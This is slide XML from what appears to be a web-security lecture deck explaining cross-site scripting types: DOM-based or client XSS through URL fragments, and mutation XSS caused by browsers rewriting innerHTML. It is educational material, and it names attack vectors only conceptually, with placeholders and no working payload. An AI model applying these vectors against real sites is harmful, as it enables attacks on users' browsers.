        <p:spPr>
          <a:xfrm>
            <a:off x="6591330" y="2660949"/>
            <a:ext cx="5355183" cy="40586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9FF2E03-637A-4A2E-AF44-75FE0D9D0C7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId265"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1031182" y="3603312"/>
            <a:ext cx="4121191" cy="3004841"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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B041B2BA-6670-43F9-8074-670A614DC10C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1111130" y="1417025"/>
            <a:ext cx="2266560" cy="1233360"/>
            <a:chOff x="8755481" y="4747220"/>
            <a:chExt cx="2266560" cy="1233360"/>
          </a:xfrm>
        </p:grpSpPr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57AF1EE5-6A18-4F0D-96EE-B0CA81823ADA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543572EF-1CE0-445B-9006-3D882EAB4181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BFAE395A-C8C5-4E37-A0D7-DBA191865BB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F1C770B7-4A6F-44CF-AFF5-3C8A0B52D889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D4574069-5116-453E-9CF6-32C4010BA4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72" name="Freihand 171">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65DC867E-5AD5-4AD1-80BA-7CA9BC6BA8F1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B79CD955-8FAA-4049-93A0-99F226A3742F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3B2B0316-D598-4FC7-AFCC-4CBB679AC645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839254FD-AC48-407E-8ECF-513B69F5F0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71DC9F95-DBDA-4B3F-85FA-70AAE644422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7BC6A12C-0A2C-4DEB-BA57-EC78F13138EE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98E4B4A4-EA96-4DCD-8C4A-4042A4C7A93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7AC384E4-0B20-442F-9B3A-EBAA8BBEAB8D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E281F031-32C1-43FA-A720-CE977FE3AA6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49" name="Freihand 148">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82FD8297-56A4-4591-9E9D-E8C94F9952D9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180D1113-0991-4892-A661-0D3EE656BB52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10A93A64-F3C2-427A-B850-E16B12698A0D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3929D030-EE2A-4BD5-92EF-B9B710E1B41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1" name="Gruppieren 150">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{873BEB6A-8B71-4664-A8BC-254BDA5B61FD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3472063-DA17-4E78-9371-509B8D805726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307FB5A5-4DEB-4E6D-A150-57C8E4413D2A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51718F6F-163C-42BE-AB5B-441693FC641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A2646EB2-61D2-4019-94E1-9DDB9356907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4" name="Gruppieren 153">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00B25FD8-97C3-4E7A-9E97-610A91FDE05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09A16ECF-2D8B-4A0E-A4C1-33891E9A2583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AE9AB745-5822-4B3D-86C2-509564808A6E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B1882655-2054-4228-B526-7C5FF8AD960E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88E22A4D-9AD2-4A84-9290-E47DF94F977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A4BB81E1-02C7-4702-8E53-F321649661E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5419465" y="1706825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EFE37D2B-3658-483A-8E70-7BD42245B749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BF602D25-1B0F-4996-B624-BE58C52D4996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4ACB0B8F-C7ED-4765-ACBD-CD19C126C112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7" name="Gruppieren 176">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8607258-8867-43D9-82B5-99FE7D090619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C94B23ED-BA6D-439D-873C-0403575B724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7BD3A896-A3F6-4E72-9B4E-53B87AC0ED3D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7B88E786-E33C-4B85-9558-CE33414EADED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60B53B5C-A2B6-4A59-8AD5-C65ECACAB863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526DC4E2-CA56-4822-861F-BE76BF683CCD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88480F26-959C-4888-BDE3-8BE19210BD71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55998DFA-1378-4BF2-ACF4-8F2388F7C029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D40A8B86-F128-4942-AE7C-897A830591F6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ABFB9311-7B1F-4C5D-A497-7A60E54F069D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A768CCEF-9CCF-47FF-B62B-366C170630F4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217BCB85-911A-4F7D-BE0A-C20F7776B79D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185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DF78EE23-F081-43C1-8E3F-7890BC4EE623}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2775313" y="1778944"/>
            <a:ext cx="66413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  <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>both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types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require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flaw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in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server-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code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A96615A-D77B-4534-B6D5-12294D36EEB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2270525" y="3586655"/>
            <a:ext cx="76509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  <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>can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think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of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scenario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happens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client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only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298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C37AFFD-9C71-450F-8E35-27E6D6CE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63" y="2991999"/>
            <a:ext cx="8198069" cy="272201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C40FBE5-531E-4CCA-8151-2127580F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312" y="258160"/>
            <a:ext cx="7729373" cy="254236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BABB386-7BF6-47C5-97F8-3D7C01FBD2A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="210207" y="5905488"/>
            <a:ext cx="11771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 err="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>payload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still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needs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travel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and back... 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327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8CC6BE9-2E11-43CB-83A5-0CB80E5ED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24" y="191815"/>
            <a:ext cx="7255751" cy="238954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40D6270-108C-4BD9-AE3D-6E39B01C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38" y="2866919"/>
            <a:ext cx="8660524" cy="28194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95B22B3-3EE9-41F5-8EF4-666BA0FE79DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="210207" y="5905488"/>
            <a:ext cx="11771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 err="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>now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client-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only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310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76FD6F19-51EC-4B7D-8EF6-594A8AA731EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="82224" y="2810741"/>
            <a:ext cx="2576301" cy="1485240"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 2576301"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1485240"/>
              <a:gd name="connsiteX1" fmla="*/ 618312 w 2576301"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1485240"/>
              <a:gd name="connsiteX2" fmla="*/ 1185098 w 2576301"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1485240"/>
              <a:gd name="connsiteX3" fmla="*/ 1880700 w 2576301"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1485240"/>
              <a:gd name="connsiteX4" fmla="*/ 2576301 w 2576301"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 1485240"/>
              <a:gd name="connsiteX5" fmla="*/ 2576301 w 2576301"/>
              <a:gd name="connsiteY5" fmla="*/ 480228 h 1485240"/>
              <a:gd name="connsiteX6" fmla="*/ 2576301 w 2576301"/>
              <a:gd name="connsiteY6" fmla="*/ 945603 h 1485240"/>
              <a:gd name="connsiteX7" fmla="*/ 2576301 w 2576301"/>
              <a:gd name="connsiteY7" fmla="*/ 1485240 h 1485240"/>
              <a:gd name="connsiteX8" fmla="*/ 1932226 w 2576301"/>
              <a:gd name="connsiteY8" fmla="*/ 1485240 h 1485240"/>
              <a:gd name="connsiteX9" fmla="*/ 1365440 w 2576301"/>
              <a:gd name="connsiteY9" fmla="*/ 1485240 h 1485240"/>
              <a:gd name="connsiteX10" fmla="*/ 721364 w 2576301"/>
              <a:gd name="connsiteY10" fmla="*/ 1485240 h 1485240"/>
              <a:gd name="connsiteX11" fmla="*/ 0 w 2576301"/>
              <a:gd name="connsiteY11" fmla="*/ 1485240 h 1485240"/>
              <a:gd name="connsiteX12" fmla="*/ 0 w 2576301"/>
              <a:gd name="connsiteY12" fmla="*/ 1005012 h 1485240"/>
              <a:gd name="connsiteX13" fmla="*/ 0 w 2576301"/>
              <a:gd name="connsiteY13" fmla="*/ 524785 h 1485240"/>
              <a:gd name="connsiteX14" fmla="*/ 0 w 2576301"/>
              <a:gd name="connsiteY14" fmla="*/ 0 h 148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6301" h="1485240" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="235628" y="21461"/>
                  <a:pt x="400278" y="1104"/>
                  <a:pt x="618312" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="836346" y="-1104"/>
                  <a:pt x="992525" y="11530"/>
                  <a:pt x="1185098" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1377671" y="-11530"/>
                  <a:pt x="1568763" y="-29480"/>
                  <a:pt x="1880700" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2192637" y="29480"/>
                  <a:pt x="2392839" y="12338"/>
                  <a:pt x="2576301" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2569560" y="165589"/>
                  <a:pt x="2596125" y="348378"/>
                  <a:pt x="2576301" y="480228"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2556477" y="612078"/>
                  <a:pt x="2566296" y="851789"/>
                  <a:pt x="2576301" y="945603"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2586306" y="1039418"/>
                  <a:pt x="2563129" y="1316736"/>
                  <a:pt x="2576301" y="1485240"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2347790" y="1495086"/>
                  <a:pt x="2068161" y="1476030"/>
                  <a:pt x="1932226" y="1485240"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1796292" y="1494450"/>
                  <a:pt x="1640425" y="1477903"/>
                  <a:pt x="1365440" y="1485240"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1090455" y="1492577"/>
                  <a:pt x="952857" y="1477973"/>
                  <a:pt x="721364" y="1485240"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="489871" y="1492507"/>
                  <a:pt x="211889" y="1464035"/>
                  <a:pt x="0" y="1485240"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-9805" y="1327280"/>
                  <a:pt x="-23155" y="1111779"/>
                  <a:pt x="0" y="1005012"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="23155" y="898245"/>
                  <a:pt x="22011" y="703191"/>
                  <a:pt x="0" y="524785"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-22011" y="346379"/>
                  <a:pt x="-1345" y="26074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7" name="Rechteck 516">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6048A784-D831-4B4B-9022-AEF16F6913FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7484333" y="1344228"/>
            <a:ext cx="1528913" cy="1567552"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1528913"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1567552"/>
              <a:gd name="connsiteX1" fmla="*/ 494349 w 1528913"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1567552"/>
              <a:gd name="connsiteX2" fmla="*/ 958119 w 1528913"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1567552"/>
              <a:gd name="connsiteX3" fmla="*/ 1528913 w 1528913"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1567552"/>
              <a:gd name="connsiteX4" fmla="*/ 1528913 w 1528913"/>
              <a:gd name="connsiteY4" fmla="*/ 506842 h 1567552"/>
              <a:gd name="connsiteX5" fmla="*/ 1528913 w 1528913"/>
              <a:gd name="connsiteY5" fmla="*/ 998008 h 1567552"/>
              <a:gd name="connsiteX6" fmla="*/ 1528913 w 1528913"/>
              <a:gd name="connsiteY6" fmla="*/ 1567552 h 1567552"/>
              <a:gd name="connsiteX7" fmla="*/ 1019275 w 1528913"/>
              <a:gd name="connsiteY7" fmla="*/ 1567552 h 1567552"/>
              <a:gd name="connsiteX8" fmla="*/ 479059 w 1528913"/>
              <a:gd name="connsiteY8" fmla="*/ 1567552 h 1567552"/>
              <a:gd name="connsiteX9" fmla="*/ 0 w 1528913"/>
              <a:gd name="connsiteY9" fmla="*/ 1567552 h 1567552"/>
              <a:gd name="connsiteX10" fmla="*/ 0 w 1528913"/>
              <a:gd name="connsiteY10" fmla="*/ 1045035 h 1567552"/>
              <a:gd name="connsiteX11" fmla="*/ 0 w 1528913"/>
              <a:gd name="connsiteY11" fmla="*/ 538193 h 1567552"/>
              <a:gd name="connsiteX12" fmla="*/ 0 w 1528913"/>
              <a:gd name="connsiteY12" fmla="*/ 0 h 15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8913" h="1567552" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="151661" y="-564"/>
                  <a:pt x="281388" y="-15761"/>
                  <a:pt x="494349" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="707310" y="15761"/>
                  <a:pt x="858117" y="12664"/>
                  <a:pt x="958119" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1058121" y="-12664"/>
                  <a:pt x="1251707" y="20407"/>
                  <a:pt x="1528913" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1508124" y="246332"/>
                  <a:pt x="1514049" y="322357"/>
                  <a:pt x="1528913" y="506842"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1543777" y="691327"/>
                  <a:pt x="1516040" y="788238"/>
                  <a:pt x="1528913" y="998008"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1541786" y="1207778"/>
                  <a:pt x="1513652" y="1380199"/>
                  <a:pt x="1528913" y="1567552"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1332582" y="1569202"/>
                  <a:pt x="1148716" y="1589114"/>
                  <a:pt x="1019275" y="1567552"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="889834" y="1545990"/>
                  <a:pt x="725218" y="1549781"/>
                  <a:pt x="479059" y="1567552"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="232900" y="1585323"/>
                  <a:pt x="211632" y="1561407"/>
                  <a:pt x="0" y="1567552"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="25689" y="1416523"/>
                  <a:pt x="15740" y="1268661"/>
                  <a:pt x="0" y="1045035"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-15740" y="821409"/>
                  <a:pt x="-21984" y="783198"/>
                  <a:pt x="0" y="538193"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21984" y="293188"/>
                  <a:pt x="-5209" y="15689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8" name="Rechteck 517">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{977DAE93-9189-4111-817E-CB83B361DF7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5747172" y="1276655"/>
            <a:ext cx="1873894" cy="672651"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1873894"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 672651"/>
              <a:gd name="connsiteX1" fmla="*/ 605892 w 1873894"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 672651"/>
              <a:gd name="connsiteX2" fmla="*/ 1174307 w 1873894"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 672651"/>
              <a:gd name="connsiteX3" fmla="*/ 1873894 w 1873894"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 672651"/>
              <a:gd name="connsiteX4" fmla="*/ 1873894 w 1873894"/>
              <a:gd name="connsiteY4" fmla="*/ 672651 h 672651"/>
              <a:gd name="connsiteX5" fmla="*/ 1286741 w 1873894"/>
              <a:gd name="connsiteY5" fmla="*/ 672651 h 672651"/>
              <a:gd name="connsiteX6" fmla="*/ 624631 w 1873894"/>
              <a:gd name="connsiteY6" fmla="*/ 672651 h 672651"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 1873894"/>
              <a:gd name="connsiteY7" fmla="*/ 672651 h 672651"/>
              <a:gd name="connsiteX8" fmla="*/ 0 w 1873894"/>
              <a:gd name="connsiteY8" fmla="*/ 0 h 67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894" h="672651" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="210153" y="-22301"/>
                  <a:pt x="363112" y="9574"/>
                  <a:pt x="605892" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="848672" y="-9574"/>
                  <a:pt x="990008" y="14941"/>
                  <a:pt x="1174307" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1358607" y="-14941"/>
                  <a:pt x="1605810" y="-30352"/>
                  <a:pt x="1873894" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1845599" y="238653"/>
                  <a:pt x="1883285" y="429690"/>
                  <a:pt x="1873894" y="672651"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1650449" y="700257"/>
                  <a:pt x="1410458" y="644975"/>
                  <a:pt x="1286741" y="672651"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1163024" y="700327"/>
                  <a:pt x="853251" y="688210"/>
                  <a:pt x="624631" y="672651"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="396011" y="657093"/>
                  <a:pt x="137364" y="674903"/>
                  <a:pt x="0" y="672651"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8536" y="347015"/>
                  <a:pt x="-31600" y="17986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7" grpId="0" animBg="1"/>
      <p:bldP spid="5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3471A-F3A0-48B3-B701-C5935C6C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DOM-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>based</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> XSS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E7AECC-3FD7-4FEE-9E0C-BC03F8B79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Payload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embedded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client-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script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flaw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server-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necessary</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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client-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>side</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>„</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Purest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>“ form: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>fragment</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>http://&lt;domain&gt;#&lt;exploit&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>&gt;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reaches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  <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>Also </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>called</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> „Client XSS“</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="291579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8DFF6-9ABA-4A58-BF3B-1F388E1B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+ Client XSS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04D85DF-C13B-4C32-806C-68FF784CF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074" y="1843521"/>
            <a:ext cx="4547400" cy="37957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E54C46D-56AB-4CF5-BA9C-1BB727BF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61" y="1843521"/>
            <a:ext cx="7258213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52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2319443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464973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7345680" y="1642110"/>
            <a:ext cx="453101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6F1678-554D-4F61-8A35-A5DFE889886C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2811780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F77692-1E02-404F-9D01-6A7C8F77CE4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2865121" y="1554480"/>
            <a:ext cx="419862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60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6459467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503073" y="4140293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7345680" y="1642110"/>
            <a:ext cx="453101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6F1678-554D-4F61-8A35-A5DFE889886C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2811780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03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9608325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528298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2887980" y="4152900"/>
            <a:ext cx="4175760" cy="2036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44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1756830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475220" y="4193062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65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442907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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1719230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8934758"/>
              </p:ext>
            </p:extLst>
          </p:nvPr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636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5D66F7-466A-41D8-9E8B-B21DFE769819}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2502398" y="2473083"/>
            <a:ext cx="74466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>
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>and for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XSS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nerds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among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21252B3-9888-4154-8E8B-815ACC0ADB4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2502398" y="3494421"/>
            <a:ext cx="73572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  <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>there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two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more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special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types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901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D890A-320D-4936-B973-97896F4BD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mXSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (mutation-based)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6755E0-FD81-4665-ADAB-6987A644B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4286"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – sets HTML in an element</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>browsers modify (“fix”) it to prevent malformed code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>in special cases, this modification changes benign string to effective payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>different browsers = different ways of modification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>different anti-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> libraries = different ways of modification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7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D0519423-E8F5-48FA-B003-DAD6B695BD87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1426028" y="2212501"/>
            <a:ext cx="9339943" cy="243299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Have</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a: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already</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>discussed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>which</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>actually</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>target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user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>instead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application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t>? 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1343995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D890A-320D-4936-B973-97896F4BD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mXSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (mutation-based) - 2019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312E5A-AD81-4C17-8784-3AB329E7E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414" y="1447635"/>
            <a:ext cx="9715172" cy="21878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BB5D5C3-FFB1-4382-B7C6-ED2877D00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583" y="3859359"/>
            <a:ext cx="4637669" cy="171734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F207D87-BC7C-4A21-8636-199619A12DDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
